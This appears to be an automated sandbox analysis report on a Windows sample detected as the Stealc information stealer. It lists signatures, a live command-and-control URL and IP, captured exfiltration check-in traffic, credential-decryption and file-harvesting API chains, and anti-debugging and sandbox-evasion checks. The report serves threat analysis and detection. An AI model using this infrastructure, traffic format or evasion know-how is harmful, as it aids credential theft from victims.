Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1544998
MD5:	b2d5f7c5a51b55bfe094dbe2a60da2e3
SHA1:	ace802a1a1b603e5361c2f3a2b4b5361b3358186
SHA256:	a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.f10000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00F29030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00F1A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00F172A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00F1A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_00F1C920

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F11710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1DF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00F162D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--

Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/b
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/w
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/wKL
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F50098	0_2_00F50098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E	0_2_0137214E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6B198	0_2_00F6B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F42138	0_2_00F42138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01364303	0_2_01364303
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F54288	0_2_00F54288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7E258	0_2_00F7E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013693DD	0_2_013693DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8D39E	0_2_00F8D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_014152DB	0_2_014152DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9B308	0_2_00F9B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01373567	0_2_01373567
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F545A8	0_2_00F545A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7D5A8	0_2_00F7D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012C7441	0_2_012C7441
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F34573	0_2_00F34573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3E544	0_2_00F3E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136E48C	0_2_0136E48C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F996FD	0_2_00F996FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F566C8	0_2_00F566C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8A648	0_2_00F8A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F86799	0_2_00F86799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6D720	0_2_00F6D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136C92F	0_2_0136C92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7F8D6	0_2_00F7F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F698B8	0_2_00F698B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6B8A8	0_2_00F6B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64868	0_2_00F64868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0128F9CE	0_2_0128F9CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136781D	0_2_0136781D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136280D	0_2_0136280D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F84BA8	0_2_00F84BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F80B88	0_2_00F80B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01365D47	0_2_01365D47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8AC28	0_2_00F8AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64DC8	0_2_00F64DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F65DB9	0_2_00F65DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F41D78	0_2_00F41D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6BD68	0_2_00F6BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7AD38	0_2_00F7AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F81EE8	0_2_00F81EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F58E78	0_2_00F58E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136FFCF	0_2_0136FFCF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0128DE5E	0_2_0128DE5E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012D1EF2	0_2_012D1EF2

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00F14610 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: yhvanrkb ZLIB complexity 0.994987962613293

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00F29790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00F23970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7W9T3KML.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2133504 > 1048576

Source: file.exe

Static PE information: Raw size of yhvanrkb is bigger than: 0x100000 < 0x19dc00

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F29BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x2149bd should be: 0x20bfe1

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: yhvanrkb
Source: file.exe	Static PE information: section name: owhwljin
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D064 push edx; mov dword ptr [esp], ebx	0_2_0138D44A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A0DC push eax; retf	0_2_00F3A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013D3176 push eax; mov dword ptr [esp], edi	0_2_013D31E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01420111 push ebp; mov dword ptr [esp], ecx	0_2_01420152
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01420111 push 12BE9830h; mov dword ptr [esp], ebp	0_2_01420195
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01420111 push 6A4B206Ch; mov dword ptr [esp], ebx	0_2_014201DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 527194D0h; mov dword ptr [esp], ebp	0_2_0137216E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 50296553h; mov dword ptr [esp], esp	0_2_01372213
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 0D3E45BCh; mov dword ptr [esp], eax	0_2_0137222F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 7B6F8124h; mov dword ptr [esp], esi	0_2_013722F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 56F78DF1h; mov dword ptr [esp], edx	0_2_01372374
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], esp	0_2_01372382
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 2E869085h; mov dword ptr [esp], eax	0_2_013723B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx	0_2_0137241C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 1B37D633h; mov dword ptr [esp], edx	0_2_01372463
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], ebx	0_2_0137248C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 2B004513h; mov dword ptr [esp], edi	0_2_013725E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 5E859901h; mov dword ptr [esp], ebp	0_2_0137260D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push edx; mov dword ptr [esp], 6DCAD2DEh	0_2_01372611
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 20941F2Dh; mov dword ptr [esp], ebp	0_2_0137262C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 389D0686h; mov dword ptr [esp], ebx	0_2_0137267F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 2EC98222h; mov dword ptr [esp], esi	0_2_01372691
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 40AABE50h; mov dword ptr [esp], ecx	0_2_01372710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], ebx	0_2_0137276E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push edx; mov dword ptr [esp], 37BE06D6h	0_2_0137279B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push edi; mov dword ptr [esp], edx	0_2_0137280B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 42DBE0D3h; mov dword ptr [esp], esp	0_2_01372867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], edx	0_2_01372902
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx	0_2_01372921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 665D2052h; mov dword ptr [esp], esp	0_2_01372969
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 5F819381h; mov dword ptr [esp], esi	0_2_01372978

Source: file.exe

Static PE information: section name: yhvanrkb entropy: 7.953026815598935

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00F29BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

